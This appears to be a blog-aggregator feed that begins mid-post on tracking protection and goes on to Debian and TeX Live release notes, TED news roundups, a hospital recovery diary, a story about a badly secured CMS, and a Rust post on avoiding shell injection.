But most users aren't in the habit of installing add-ons, so browsers will probably have to give them a nudge, like Microsoft Windows does when it nags the user to pick an antivirus package (or did last time I checked.) So the decentralized way to catch up to Apple could end up being something like:

  • When new tracking protection methods show up in the privacy literature, quietly build the needed browser add-on APIs to make it possible for new add-ons to implement them.

  • Do user research to guide the content and timing of nudges. (Some atypical users prefer to be tracked, and should be offered a chance to silence the warnings by affirmatively choosing a do-nothing protection option.)

  • Help users share information about the pros and cons of different tools. If a tool saves lots of bandwidth and battery life but breaks some site's comment form, help the user make the right choice.

  • Sponsor innovation challenges to incentivize development, testing, and promotion of diverse tracking protection tools.

Any surveillance marketer can install and test a copy of Safari, but working around an explosion of tracking protection tools would be harder. How to set priorities when they don't know which tools will get popular?

What about adfraud?

Tracking protection strategies have to take adfraud into account. Marketers have two choices for how to deal with adfraud:

  • flight to quality

  • extra surveillance

Flight to quality is better in the long run. But it's a problem from the point of view of adtech intermediaries because it moves more ad money to high-reputation sites, and the whole point of adtech is to reach big-money eyeballs on cheap sites. Adtech firms would rather see surveillance-heavy responses to adfraud. One way to help shift marketing budgets away from surveillance, and toward flight to quality, is to make the returns on surveillance investments less predictable.

This is possible to do without making value judgments about certain kinds of sites. If you like a site enough to let it see your personal info, you should be able to do it, even if in my humble opinion it's a crappy site. But you can have this option without extending to all crappy sites the confidence that they'll be able to live on leaked data from unaware users.

,

Planet DebianSteve McIntyre: So, Stretch happened...

Things mostly went very well, and we've released Debian 9 this weekend past. Many many people worked together to make this possible, and I'd like to extend my own thanks to all of them.

As a project, we decided to dedicate Stretch to our late founder Ian Murdock. He did much of the early work to get Debian going, and inspired many more to help him. I had the good fortune to meet up with Ian years ago at a meetup attached to a Usenix conference, and I remember clearly he was a genuinely nice guy with good ideas. We'll miss him.

For my part in the release process, again I was responsible for producing our official installation and live images. Release day itself went OK, but as is typical the process ran late into Saturday night / early Sunday morning. We made and tested lots of different images, although numbers were down from previous releases as we've stopped making the full CD sets now.

Sunday was the day for the release party in Cambridge. As is traditional, a group of us met up at a local hostelry for some revelry! We hid inside the pub to escape from the ridiculously hot weather we're having at the moment.

Party

Due to a combination of the lack of sleep and the heat, I nearly forgot to even take any photos - apologies to the extra folks who'd been around earlier whom I missed with the camera... :-(

Planet DebianAndreas Bombe: New Blog

So I finally got myself a blog to write about my software and hardware projects, my work in Debian and, I guess, stuff. Readers of planet.debian.org, hi! If you can see this I got the configuration right.

For the curious, I’m using a static site generator for this blog — Hugo to be specific — like all the cool kids do these days.

TEDListen in on couples therapy with Esther Perel, Tabby’s star dims again, and more

Behold, your recap of TED-related news:

The truth about couples. Ever wonder what goes on in couples therapy? You may want to tune in to Esther Perel’s new podcast “Where Should We Begin?” Each episode invites the reader to listen to a real session with a real couple working out real issues, from a Christian couple bored with their sex life to a couple dealing with the aftermath of an affair, learning how to cope and communicate, express and excite. Perel hopes her audience will walk away with a sense of “truth” surrounding relationships — and maybe take away something for their own relationships. As she says: “You very quickly realize that you are standing in front of the mirror, and that the people that you are listening to are going to give you the words and the language for the conversations you want to have.” The first four episodes of “Where Should We Begin?” are available on Audible, with new episodes added every Friday. (Watch Perel’s TED Talk)

Three TEDsters join the Media Lab. MIT’s Media Lab has chosen its Director’s Fellows for 2017, inviting nine extraordinary people to spend two years working with each other, MIT faculty and students to move their work forward. Two of the new Fellows are TED speakers — Adam Foss and Jamila Raqib — and a third is a TED Fellow, activist Esra’a Al Shafei. In a press release, Media Lab Director (and fellow TED speaker) Joi Ito said the new crop of fellows “aligns with our mission to create a better future for all,” with an emphasis on “civic engagement, social change, education, and creative disruption.” (Watch Foss’ TED Talk and Raqib’s TED Talk)

The mystery of KIC 8462852 deepens. Tabby’s Star, notorious for “dipping,” is making headlines again with a dimming event that started in May. Astronomer Tabetha Boyajian, the star’s namesake, has been trying to crack the mystery since the flickering was noticed in 2011. The star’s dimming is erratic—sometimes losing up to 20 percent of its brightness—and has prompted a variety of potential explanations. Some say it’s space debris, others say it’s asteroids. Many blame aliens. Nobody knows for sure, still, but you can follow Boyajian on Twitter for updates. (Watch Boyajian’s TED talk)

AI: friend or foe? The big fear with AI is that humanity will be replaced or overrun, but Nicholas Christakis has been entertaining an alternative view: how can AI complement human beings? In a new study conducted at Yale, Christakis experimented with human and AI interaction. Subjects worked with anonymous AI bots in a collaborative color-coordination game, and the bots were programmed with varying behavioral randomness — in other words, they made mistakes. Christakis’ findings showed that even when paired with error-prone AI, human performance still improved. Groups solved problems 55.6% faster when paired with bots—particularly when faced with difficult problems. “The bots can help humans to help themselves,” Christakis said. (Watch Christakis’ TED Talk)

A bundle of news from TED architects. Alejandro Aravena’s Chile-based design team, Elemental, won the competition to design the Art Mill, a new museum in Doha, Qatar. The museum site is now occupied by Qatar Flour Mills, and Elemental’s design pays homage to the large grain silos it will replace. Meanwhile, The Shed, a new building in New York City designed by Liz Diller and David Rockwell, recently underwent testing. The building is designed in two parts: an eight-level tower and a teflon-based outer shell that can slide on runners over an adjacent plaza. The large shell moves using a gantry crane, and only requires the horsepower of a Toyota Prius.  When covering the plaza, the shell can house art exhibits and performances. Finally, Joshua Prince-Ramus’ architecture firm, REX, got the nod to design a new performing arts center at Brown University. It will feature a large performance hall, smaller rehearsal spaces, and rooms for practice and instruction—as well as a lobby and cafe. (Watch Aravena’s TED Talk, Diller’s TED Talk, Rockwell’s TED Talk, and Prince-Ramus’ TED Talk)

Have a news item to share? Write us at contact@ted.com and you may see it included in this round-up.


TEDA noninvasive method for deep brain stimulation, a new class of Emerging Explorers, and much more

As usual, the TED community has lots of news to share this week. Below, some highlights.

Surface-level brain stimulation. The delivery of an electric current to the part of the brain involved in movement control, known as deep brain stimulation, is sometimes used to treat people with Parkinson’s disease, depression, epilepsy and obsessive compulsive disorder. However, the process isn’t risk-free — and there are few people who possess the skill set to open a skull and implant electrodes in the brain. A new study, of which MIT’s Ed Boyden was the senior author, has found a noninvasive method: placing electrodes on the scalp rather than in the skull. This may make deep brain stimulation available to more patients and allow the technique to be more easily adapted to treat other disorders. (Watch Boyden’s TED Talk)

Rooms for refugees. Airbnb unveiled a new platform, Welcome, which provides housing to refugees and evacuees free of charge. Using its extensive network, Airbnb is partnering with global and local organizations that will have access to Welcome in order to pair refugees with available lodging. The company aims to provide temporary housing for 100,000 displaced persons over the next five years. Airbnb co-founder, Joe Gebbia, urges anybody with a spare room to “play a small role in tackling this global challenge”; so far, 6,000 people have answered his call. (Watch Gebbia’s TED Talk)

A TEDster joins The Shed. Kevin Slavin has been named Chief Science and Technology Officer of The Shed. Set to open in 2019, The Shed is a uniquely-designed space in New York City that will bring together leading thinkers in the arts, the humanities and the sciences to create innovative art. Slavin’s multidisciplinary—or, as he puts it, anti-disciplinary—mindset seems a perfect fit for The Shed’s mission of “experimentation, innovation, and collaboration.” Slavin, who was behind the popular game Drop 7, has run a research lab at MIT’s Media Lab, and has showcased his work in MoMA, among other museums. The Shed was designed by TEDsters Liz Diller and David Rockwell. (Watch Slavin’s TED Talk, Diller’s TED Talk and Rockwell’s TED Talk)

Playing with politics. Designing a video to feel as close to real life as possible often means intricate graphics and astutely crafted scripts. For game development studio Klang, it also means replicating politics. That’s why Klang has brought on Lawrence Lessig to build the political framework for their new game, Seed. Described as “a boundless journey for human survival, fuelled by discovery, collaboration and genuine emotion,” Seed is a vast multiplayer game whose simulation continues even after a player has logged off. Players are promised “endless exploration of a living, breathing exoplanet” and can traverse this new planet forming colonies, developing relationships, and collaborating with other players. Thanks to Lessig, they can also choose their form of government and appointed officials. While the game will not center on politics, Lessig’s contributions will help the game evolve to more realistically resemble real life. (Watch Lessig’s TED Talk)

A new class of explorers. National Geographic has announced this year’s Emerging Explorers. TED Speaker Anand Varma and TED Fellows Keolu Fox and Danielle N. Lee are among them. Varma is a photographer who uses the medium to turn science into stories, as he did in his TED talk about threats faced by bees. Fox’s work connects the human genome to disease; he advocates for more diversity in the field of genetics. He believes that indigenous peoples should be included in genome sequencing not only for the sake of social justice, but for science. Studying Inuit genetics, for example, may provide insight into how they keep a traditionally fat-rich diet but have low rates of heart disease. Danielle N. Lee studies practical applications for rodents—like the African giant pouched rats trained to locate landmines. The rats are highly trainable and low-maintenance, and Lee’s research aims to tap into this unlikely resource. (Watch Varma’s TED Talk, Fox’s TED Talk and Lee’s TED Talk)

Collaborative fellowship awarded to former head of DARPA. Joining the ranks of past fellows Ruth Bader Ginsberg, Deborah Tannen and Amos Tversky is Arati Prabhakar, who has been selected for the 2017-18 fellowship at Stanford’s Center for Advanced Study in the Behavioral Sciences (CASBS). While Prabhakar’s field of expertise is in electrical engineering and applied physics, she is one of 37 fellows of various backgrounds ranging from architecture to law, and religion to statistics, to join the program. CASBS seeks to solve societal problems through interdisciplinary collaborative projects and research. At the heart of this mission is their fellowship program, says associate director Sally Schroeder. “Fellows represent all that is great about this place. It’s imperative that we continue to attract the highest quality, innovative thinkers, and we’re confident we’ve reached that standard of excellence once again with the 2017-18 class.” (Watch Prabhakar’s TED Talk)

Have a news item to share? Write us at contact@ted.com and you may see it included in this biweekly round-up.


Worse Than FailureThe CMS From Hell

Hortus Deliciarum - Hell

Contracting can be really hit or miss. Sometimes, you're given a desk and equipment and treated just like an employee, except better paid and exempt from team-building exercises. Sometimes, however, you're isolated in your home office, never speaking to anyone, working on tedious, boring crap they can't convince their normal staff to do.

Eric was contracted to perform basic website updating tasks for a government agency. Most of the work consisted of receiving documents, uploading them to the server, and adding them to a page. There were 4 document categories, each one organized by year. Dull as dishwater, but easy.

The site was hosted by a third party in a shared hosting environment. It ran on a CMS produced by another party. WTFCMS was used in many high-profile sites, so the agency figured it had to be good. Eric was given login credentials and—in the way of techies given boring tasks everywhere—immediately began automating the task at hand.

Step 1 of this automation was to get a list of articles with their IDs. Eric was pleased to discover that the browser-based interface for the CMS used a JSON request to get the list of pages. With the help of good old jq, he soon had that running in a BASH shell script. To get the list of children for an article, he passed the article's ID to the getChildren endpoint.

Usually, in a hierarchy like this, there's some magic number that means "root element." Eric tried sending a series of likely candidates, like 0, -1, MAX_INT, and MIN_INT. It turned out to be -1 ... but he also got a valid list when he passed in 0.

Curious, he thought to himself. This appears to be a list of articles ... and hey, here's the ones I got for this site. These others ...? No way.

Sure enough, passing in a parent ID of 0 had gotten Eric some sort of super-root: every article across every site in the entire CMS system. Vulnerability number 1.

Step 2 was to take the ID list and get the article data so he could associate the new file with it. This wasn't nearly as simple. There was no good way to get the text of the article from the JSON interface; the CMS populated the articles server-side.

Eric was in too deep to stop now, though. He wrote a scraper for the edit page, using an XML parser to handle the HTML form that held the article text. Once he had the text, he compared it by hand to the POST request sent from his Firefox instance to ensure he had the right data.

And he did ... mostly. Turns out, the form was manipulated by on-page Javascript before being submitted: fields were disabled or enabled, date/time formats were tweaked, and the like. Eric threw together some more scripting to get the job done, but now he wasn't sure if he would hit an edge case or somehow break the database if he ran it. Still, he soldiered on.

Step 3 was to upload the files so they could be linked to the article. With Firebug open, Eric went about adding an upload.

Now, WTFCMS seemed to offer the usual flow: enter a name, select a file, and click Upload to both upload the file and save it as the given name. When he got to step 2, however, the file was uploaded immediately—but he still had to click the Upload button to "save" it.

What happens if I click Cancel? Eric wondered. No, never mind, I don't want to know. What does the POST look like?

It was a mess of garbage. Eric was able to find the file he uploaded, and the name he'd given it ... and also a bunch of server-side information the user shouldn't be privy to, let alone be able to tamper with. Things like, say, the directory on the server where the file should be saved. Vulnerability number 2.

The response to the POST contained, unexpectedly, HTML. That HTML contained an iframe. The iframe contained an iframe. iframe2 contained iframe3; iframe3 contained a form. In that form were two fields: a submit button, reading "Upload", and a hidden form field containing the path of the uploaded file. In theory, he could change that to read anything on the server. Now he had both read and write access to any arbitrary destination in the CMS, maybe even on the server itself. Vulnerability number 3.

It was at this point that Eric gave up on his script altogether. This is the kind of task that Selenium IDE is perfect for. He just kept his head down, hoped that the server had some kind of validation to prevent curious techies like himself from actually exploiting any of these potential vulnerabilities, and served out the rest of his contract.

[Advertisement] Release! is a light card game about software and the people who make it. Play with 2-5 people, or up to 10 with two copies - only $9.95 shipped!

Planet DebianFoteini Tsiami: Internationalization, part one

The first part of internationalizing a Greek application is, of course, translating all the Greek text to English. I already knew how to open a user interface (.ui) file with Glade and how to translate/save it from there, and mail the result to the developers.

If only it was that simple! I learned that the code of most open source software is kept on version control systems, which fortunately are a bit similar to Wikis, which I was familiar with, so I didn’t have a lot of trouble understanding the concepts. Thanks to a very brief git crash course from my mentors, I was able to quickly start translating, committing, and even pushing back the updated files.

The other tricky part was internationalizing the Python source code. There, Glade couldn't be used; a text editor like Pluma was needed instead. And since the messages were part of the source code, I had to be extra careful not to break the syntax. The English text then needed to be wrapped in _(), which performs the gettext call that dynamically translates the messages into the user's language.

All this was very educative, but now that the first part of the internationalization, i.e. the Greek-to-English translation, is over, I think I'll take some time to read more about the tools that I used!


Planet DebianNorbert Preining: TeX Live 2017 hits Debian/unstable

Yesterday I uploaded the first packages of TeX Live 2017 to Debian/unstable, meaning that the new release cycle has started. Debian/stretch was released over the weekend, and this opened up unstable for new developments. The upload comprised the following packages: asymptote, cm-super, context, context-modules, texlive-base, texlive-bin, texlive-extra, texlive-lang, texworks, xindy.

I mentioned already in a previous post the following changes:

  • several packages have been merged, some are dropped (eg. texlive-htmlxml) and one new package (texlive-plain-generic) has been added
  • luatex got updated to 1.0.4, and is now considered stable
  • updmap and fmtutil now require either -sys or -user
  • tlmgr got a shell mode (interactive/scripting interface) and a new feature to add arbitrary TEXMF trees (conf auxtrees)

The last two changes are described together with other news (easy TEXMF tree management) in the TeX Live release post. These changes more or less sum up the new infrastructure developments in TeX Live 2017.

Since the last release to unstable (which happened on 2017-01-23), about half a year of package updates has accumulated; below is an approximate list of updates (not split into new/updated, though).

Enjoy the brave new world of TeX Live 2017, and please report bugs to the BTS!

Updated/new packages:
academicons, achemso, acmart, acro, actuarialangle, actuarialsymbol, adobemapping, alkalami, amiri, animate, aomart, apa6, apxproof, arabluatex, archaeologie, arsclassica, autoaligne, autobreak, autosp, axodraw2, babel, babel-azerbaijani, babel-english, babel-french, babel-indonesian, babel-japanese, babel-malay, babel-ukrainian, bangorexam, baskervaldx, baskervillef, bchart, beamer, beamerswitch, bgteubner, biblatex-abnt, biblatex-anonymous, biblatex-archaeology, biblatex-arthistory-bonn, biblatex-bookinother, biblatex-caspervector, biblatex-cheatsheet, biblatex-chem, biblatex-chicago, biblatex-claves, biblatex-enc, biblatex-fiwi, biblatex-gb7714-2015, biblatex-gost, biblatex-ieee, biblatex-iso690, biblatex-manuscripts-philology, biblatex-morenames, biblatex-nature, biblatex-opcit-booktitle, biblatex-oxref, biblatex-philosophy, biblatex-publist, biblatex-shortfields, biblatex-subseries, bibtexperllibs, bidi, biochemistry-colors, bookcover, boondox, bredzenie, breqn, bxbase, bxcalc, bxdvidriver, bxjalipsum, bxjaprnind, bxjscls, bxnewfont, bxorigcapt, bxpapersize, bxpdfver, cabin, callouts, chemfig, chemformula, chemmacros, chemschemex, childdoc, circuitikz, cje, cjhebrew, cjk-gs-integrate, cmpj, cochineal, combofont, context, conv-xkv, correctmathalign, covington, cquthesis, crimson, crossrefware, csbulletin, csplain, csquotes, css-colors, cstldoc, ctex, currency, cweb, datetime2-french, datetime2-german, datetime2-romanian, datetime2-ukrainian, dehyph-exptl, disser, docsurvey, dox, draftfigure, drawmatrix, dtk, dviinfox, easyformat, ebproof, elements, endheads, enotez, eqnalign, erewhon, eulerpx, expex, exsheets, factura, facture, fancyhdr, fbb, fei, fetamont, fibeamer, fithesis, fixme, fmtcount, fnspe, fontmfizz, fontools, fonts-churchslavonic, fontspec, footnotehyper, forest, gandhi, genealogytree, glossaries, glossaries-extra, gofonts, gotoh, graphics, graphics-def, graphics-pln, grayhints, gregoriotex, gtrlib-largetrees, gzt, halloweenmath, handout, hang, 
heuristica, hlist, hobby, hvfloat, hyperref, hyperxmp, ifptex, ijsra, japanese-otf-uptex, jlreq, jmlr, jsclasses, jslectureplanner, karnaugh-map, keyfloat, knowledge, komacv, koma-script, kotex-oblivoir, l3, l3build, ladder, langsci, latex, latex2e, latex2man, latex3, latexbug, latexindent, latexmk, latex-mr, leaflet, leipzig, libertine, libertinegc, libertinus, libertinust1math, lion-msc, lni, longdivision, lshort-chinese, ltb2bib, lualatex-math, lualibs, luamesh, luamplib, luaotfload, luapackageloader, luatexja, luatexko, lwarp, make4ht, marginnote, markdown, mathalfa, mathpunctspace, mathtools, mcexam, mcf2graph, media9, minidocument, modular, montserrat, morewrites, mpostinl, mptrees, mucproc, musixtex, mwcls, mweights, nameauth, newpx, newtx, newtxtt, nfssext-cfr, nlctdoc, novel, numspell, nwejm, oberdiek, ocgx2, oplotsymbl, optidef, oscola, overlays, pagecolor, pdflatexpicscale, pdfpages, pdfx, perfectcut, pgfplots, phonenumbers, phonrule, pkuthss, platex, platex-tools, polski, preview, program, proofread, prooftrees, pst-3dplot, pst-barcode, pst-eucl, pst-func, pst-ode, pst-pdf, pst-plot, pstricks, pstricks-add, pst-solides3d, pst-spinner, pst-tools, pst-tree, pst-vehicle, ptex2pdf, ptex-base, ptex-fontmaps, pxbase, pxchfon, pxrubrica, pythonhighlight, quran, ran_toks, reledmac, repere, resphilosophica, revquantum, rputover, rubik, rutitlepage, sansmathfonts, scratch, seealso, sesstime, siunitx, skdoc, songs, spectralsequences, stackengine, stage, sttools, studenthandouts, svg, tcolorbox, tex4ebook, tex4ht, texosquery, texproposal, thaienum, thalie, thesis-ekf, thuthesis, tikz-kalender, tikzmark, tikz-optics, tikz-palattice, tikzpeople, tikzsymbols, titlepic, tl17, tqft, tracklang, tudscr, tugboat-plain, turabian-formatting, txuprcal, typoaid, udesoftec, uhhassignment, ukrainian, ulthese, unamthesis, unfonts-core, unfonts-extra, unicode-math, uplatex, upmethodology, uptex-base, urcls, variablelm, varsfromjobname, visualtikz, xassoccnt, xcharter, xcntperchap, 
xecjk, xepersian, xetexko, xevlna, xgreek, xsavebox, xsim, ycbook.

LongNowThe Industrial Sublime: Edward Burtynsky Takes the Long View

“Oil Bunkering #1, Niger Delta, Nigeria 2016” / Photograph by Edward Burtynsky

The New Yorker recently profiled photographer, former SALT speaker, and 02016 sponsor of the Conversations at the Interval livestream Edward Burtynsky and his quest to document a changing planet in the anthropocene age.

“What I am interested in is how to describe large-scale human systems that impress themselves upon the land,” Burtynsky told New Yorker staff writer Raffi Khatchadourian as they surveyed the decimated, oil-covered landscapes of Lagos, Nigeria from a helicopter.

“Saw Mills #1, Niger Delta, Nigeria 2016” / Photograph by Edward Burtynsky

For over three decades, Edward Burtynsky has been taking large-format photographs of industrial landscapes, including mining locations around the globe and the building of the Three Gorges Dam in China. His work has been noted for beautiful images which are often at odds with their subjects' negative environmental impacts.

Photograph by Benedicte Kurzen / Noor for The New Yorker

“This is the sublime of our time,” said Burtynsky in his 02008 SALT Talk, which included a formal proposal for a permanent art gallery in the chamber that encloses the 10,000-year Clock, as well as the results of his research into methods of capturing images that might have the best chance to survive in the long-term.

“Oil Bunkering #4, Niger Delta, Nigeria 2016” / Photograph by Edward Burtynsky

As Khatchadourian notes, Burtynsky's approach has at times attracted controversy:

Over the years, greater skepticism has been voiced about […] Burtynsky’s inclination to depict toxic landscapes in visually arresting terms. A critic responding to “Oil” wondered whether the fusing of beauty with monumentalism, of extreme photographic detachment with extreme ecological damage, could trigger only apathy as a response. [Curator] Paul Roth had a different view: “Maybe these people are a bit immune to the sublime—being terribly anxious while also being attracted to the beauty of an image.”

“Oil Bunkering #2, Niger Delta, Nigeria 2016” / Photograph by Edward Burtynsky

Burtynsky does not seek to be heavy-handed or pedantic in his work, but neither does he seek to be amoral. The environmental and human rights issues are directly shown, rather than explicitly proclaimed.

“Oil Bunkering #5, Niger Delta, Nigeria 2016” / Photograph by Edward Burtynsky

In recent years Burtynsky’s work has focused on water, including oil spills around the world, like the ones he was documenting in Lagos, a city he calls a “hyper crucible of globalism.”

As the global consequences of human activity have become unmistakably pressing, Burtynsky has connected his photography more directly with environmentalism. “There has been a discussion for a long time about climate change, but we don’t seem to be ceasing anything,” he says. “That has begun to bring a sense of urgency to me.”

Burtynsky is currently working on the film Anthropocene, which documents unprecedented human impact on the natural world.

Read The New Yorker profile of Burtynsky in full.

,

Planet DebianJeremy Bicha: GNOME Tweak Tool 3.25.3

Today I released the second development snapshot (3.25.3) of what will be GNOME Tweak Tool 3.26.

I consider the initial User Interface (UI) rework proposed by the GNOME Design Team to be complete now. Every page in Tweak Tool has been updated, either in this snapshot or the previous development snapshot.

The hard part still remains: making the UI look as good as the mockups. Tweak Tool’s backend makes this a bit more complicated than usual for an app like this.

Here are a few visual highlights of this release.

The Typing page has been moved into an Additional Layout Options dialog in the Keyboard & Mouse page. Also, the Compose Key option has been given its own dialog box.

Florian Müllner added content to the Extensions page that is shown if you don’t have any GNOME Shell extensions installed yet.

A hidden feature that GNOME has had for a long time is the ability to move the Application Menu from the GNOME top bar to a button in the app’s title bar. This is easy to enable in Tweak Tool by turning off the Application Menu switch in the Top Bar page. This release improves how well that works, especially for Ubuntu users where the required hidden appmenu window button was probably not pre-configured.

Some of the ComboBoxes have been replaced by ListBoxes. One example is on the Workspaces page where the new design allows for more information about the different options. The ListBoxes are also a lot easier to select than the smaller ComboBoxes were.

For details of these and other changes, see the commit log or the NEWS file.

GNOME Tweak Tool 3.26 will be released alongside GNOME 3.26 in mid-September.

Planet DebianShirish Agarwal: Seizures, Vigo and bi-pedal motion

Dear all, an update is in order. While talking to my physiotherapist a couple of days ago, I came to know the correct term for what I had experienced: a convulsive 'seizure', spasms being a part of it. Reading the Wikipedia entry and the associated links/entries, it seems I am and was very, very lucky.

The hospital, or any hospital, is a very bad place. I have seen all the horror movies that people say are disturbing, but I have never been disturbed as much as I was in hospital. I couldn't help but hear people's screams, and I saw so many cases turn critical. At times it was not easy to remain positive, but from somewhere there was a will to live which pushed me and is still pushing me.

One of the things that was painful for a long time was the almost constant stream of injections given to me. It was almost an afterthought that the nurse put a Vigo in me.

Similar to the Vigo injected in me.

While the above medical device is similar, mine had a cross and the needle was much shorter; it is injected into the vein. After that, all injections are given through it, including the common salt-and-water liquid given to patients first to stabilize them. I can't remember its name at the moment.

I also had a urine bag, which was attached to my penis in a non-invasive manner. Both my grandfather and grandma used to cry when things went wrong with theirs, while I didn't feel any pain except when the urine bag was detached and attached again, so it seems things have improved there.

I was also very conscious of getting bed sores, as both my grandpa and grandma had them when in hospital. As I had no strength, I had to beg, plead, do everything to make sure that every few hours I was turned from one side to the other. I also had an air bed which is supposed to alleviate or relieve this condition.

Constant physiotherapy every day slowly increased my strength, and in time both the Vigo and the feeding tube put inside my throat were removed.

I have no remembrance of when they put in the feeding tube, as it was all rubber, and it felt bad when it came out.

Further physiotherapy helped me crawl to the top of the bed; the bed was around 6 feet in length, more than enough that I could turn to both sides without falling over.

A few days later I found I could also sit up, using my legs as a lever, and that gave the doctors confidence to remove the air bed so I could crawl more easily.

A couple more days later I stood on my feet for the first time, and it was like I had legs of lead. Each step was painful, but the sense and feeling of independence won over whatever pain there was.

I had to endure wet wipes from nurses and ward boys in place of a shower every day, and while they were always respectful, it felt humiliating.

The first time I had a bath, after 2 weeks or so, every part of my body cried and I felt like a weakling. I had thought I wouldn't be able to do justice to the physiotherapy session which came soon after, but after the session I was back to feeling normal.

For a while I was doing the penguin waddle, which, while painful, also had humor in it. I did think of filming the penguin waddle but decided against it, as I was half-naked most of the time (the hospital clothes never fit me properly).

Cut to today, and I was able to climb up and down the stairs on my own and circle my own block; slowly, but I was able to do it by myself.

While I have always had a sense of wonderment about bi-pedal motion, as well as all other means of transport, I found much more respect for walking. I live near a fast-food joint, so I see lots of youngsters posing in different ways with their legs to show interest to their mates. And this, I know, happens on both the conscious and sub-conscious levels. Being able to see and discern that also put a sense of wonder in nature's creations.

All in all, I'm probably around 40% independent and still 60% interdependent. I know I have to be patient with myself and those around me, and explain to others what I'm going through.

For example, I still tend to spill things and still can't touch-type much.

So, the road is long. I can only pray and hope the best for anybody who is in my condition, and do pray that nobody goes through what I went through, especially not children.

I am also hoping that things like DxtER and a range of non-invasive treatments make their way into India and the developing world at large.

To anybody who is overweight and is either disgusted by or doesn't like the gym route, I would recommend doing sessions with a physiotherapist that you can trust. You have to trust that her judgement will push you a bit more, but not so much that the gains you make are toppled over.

I still get dizzy spells while doing therapy, but I have the will to break through them, as I know the dizziness doesn't help me.

I hope my writings give strength and understanding to somebody who is going through this, or to relatives and/or caregivers, so they know the mental state of the person going through it.

Till later and sorry it became so long.

Update – I forgot to share this inspirational story, which I shared with a friend days ago. Add to that, she is from my city. What it doesn't share is that Triund is a magical place. I had visited once with a friend who had put on elf ears, and it is the kind of place The Alchemist talks about, a place where imagination turns wild and there is magic in the air.


Filed under: Miscellenous Tagged: #air bag, #bed sores, #convulsive epileptic seizure, #crawling, #horror, #humiliation, #nakedness, #penguin waddle, #physiotherapy, #planet-debian, #spilling things, #urine bag, #Vigo medical device

Planet DebianVasudev Kamath: Update: - Shell pipelines with subprocess crate and use of Exec::shell function

In my previous post I used the Exec::shell function from the subprocess crate and passed it a string generated by interpolating the --author argument. This string was then run by the shell via Exec::shell. After publishing the post I was pinged on IRC by Jonas Smedegaard and Paul Wise, telling me that I should replace Exec::shell, as it might be prone to errors or shell injection attacks. Indeed they were right; in my hurry I had not completely read the function documentation, which clearly mentions this fact.

When invoking this function, be careful not to interpolate arguments into the string run by the shell, such as Exec::shell(format!("sort {}", filename)). Such code is prone to errors and, if filename comes from an untrusted source, to shell injection attacks. Instead, use Exec::cmd("sort").arg(filename).

Though I'm not directly taking input from an untrusted source, it's still possible that the string I got back from the git log command contains some oddly formatted text with characters in a different encoding, which could possibly break Exec::shell, as I'm not sanitizing the shell command. When we use Exec::cmd and pass arguments using .args chaining, the library takes care of creating a safe command line. So I went in and modified the function to use Exec::cmd instead of Exec::shell.

Below is updated function.

fn copyright_fromgit(repo: &str) -> Result<Vec<String>> {
    let tempdir = TempDir::new_in(".", "debcargo")?;
    // join() waits for the clone to finish before we read the log;
    // popen() would leave it running in the background.
    Exec::cmd("git")
     .args(&["clone", "--bare", repo, tempdir.path().to_str().unwrap()])
     .stdout(subprocess::NullFile)
     .stderr(subprocess::NullFile)
     .join()?;

    let author_process = {
        Exec::shell(OsStr::new("git log --format=\"%an <%ae>\"")).cwd(tempdir.path()) |
        Exec::shell(OsStr::new("sort -u"))
    }.capture()?;
    let authors = author_process.stdout_str().trim().to_string();
    let authors: Vec<&str> = authors.split('\n').collect();
    let mut notices: Vec<String> = Vec::new();
    for author in &authors {
        let author_string = format!("--author={}", author);
        let first = {
            Exec::cmd("/usr/bin/git")
             .args(&["log", "--format=%ad",
                    "--date=format:%Y",
                    "--reverse",
                    &author_string])
             .cwd(tempdir.path()) | Exec::shell(OsStr::new("head -n1"))
        }.capture()?;

        let latest = {
            Exec::cmd("/usr/bin/git")
             .args(&["log", "--format=%ad", "--date=format:%Y", &author_string])
             .cwd(tempdir.path()) | Exec::shell("head -n1")
        }.capture()?;

        let start = i32::from_str(first.stdout_str().trim())?;
        let end = i32::from_str(latest.stdout_str().trim())?;
        let cnotice = match start.cmp(&end) {
            Ordering::Equal => format!("{}, {}", start, author),
            _ => format!("{}-{}, {}", start, end, author),
        };

        notices.push(cnotice);
    }

    Ok(notices)
}

I still use Exec::shell for generating the author list; this is not problematic, as I'm not interpolating arguments to create the command string.

Sociological ImagesAre Millennials having less sex? Or more? And what’s coming next?

Based on analyses of General Social Survey data, a well-designed and respected source of data about American life, members of the Millennial generation are acquiring about the same number of sexual partners as the Baby Boomers did. This data suggests that the big generational leap was between the Boomers and the generation before them, not between the Boomers and everyone that came after. And rising behavioral permissiveness definitely didn't start with the Millennials. Sexually speaking, Millennials look a lot like their parents at the same age and are perhaps even less sexually active than Generation X.

Is it true?

It doesn’t seem like it should be true. In terms of attitudes, American society is much more sexually permissive than it was for Boomers, and Millennials are especially more permissive. Boomers had to personally take America through the sexual revolution at a time when sexual permissiveness was still radical, while Generation X had to contend with a previously unknown fatal sexually transmitted pandemic. In comparison, the Millennials have it so easy. Why aren’t they having sex with more people?

A new study using data from the National Survey of Family Growth (NSFG) (hat tip Paula England) contrasts with previous studies and reports an increase. It finds that nine out of ten Millennial women had non-marital sex by the time they were 25 years old, compared to eight out of ten Baby Boomers. And, among those, Millennials reported two additional total sexual partners (6.5 vs. 4.6).

Nonmarital Sex by Age 25, Paul Hemez

Are Millennials acquiring more sexual partners after all?

I’m not sure. The NSFG report used “early” Millennials (only ones born between 1981 and 1990). In a not-yet-released book, the psychologist Jean Twenge uses another survey — the Youth Risk Behavior Surveillance System — to argue that the next generation (born between 1995 and 2002), which she calls the “iGen,” is even less likely to be sexually active than the Millennials. According to her analysis, 37% of 9th graders in 1995 (born in 1981, arguably the first Millennial year) had lost their virginity, compared to 34% in 2005 and 24% in 2015.

Percentage of high school students who have ever had sex, by grade. Youth Risk Behavior Surveillance System, 1991-2015.

iGen, Jean Twenge

If Twenge is right, then we’re seeing a decline in the rate of sexual initiation and possibly partner acquisition that starts somewhere near the transition between Gen X and Millennial, proceeds apace throughout the Millennial years, and is continuing — Twenge argues accelerating — among the iGens. So, if the new NSFG report finds an increase in sexual partners between the Millennials and the Boomers, it might be because they sampled on “early” Millennials, those closer to Gen Xers, on the top side of the decline.

Honestly, I don’t know. It’s interesting, though. And it’s curious why the big changes in sexually permissive attitudes haven’t translated into equally sexually permissive behaviors, or have actually accompanied a decrease in sexual behavior. It depends a lot on how you chop up the data, too. Generations, after all, are all artificial categories. And variables like “nonmarital sex by age 25” are specific, and may get us different findings than other measures would. Sociological questions have lots of moving parts, and it looks as if we’re still figuring this one out.

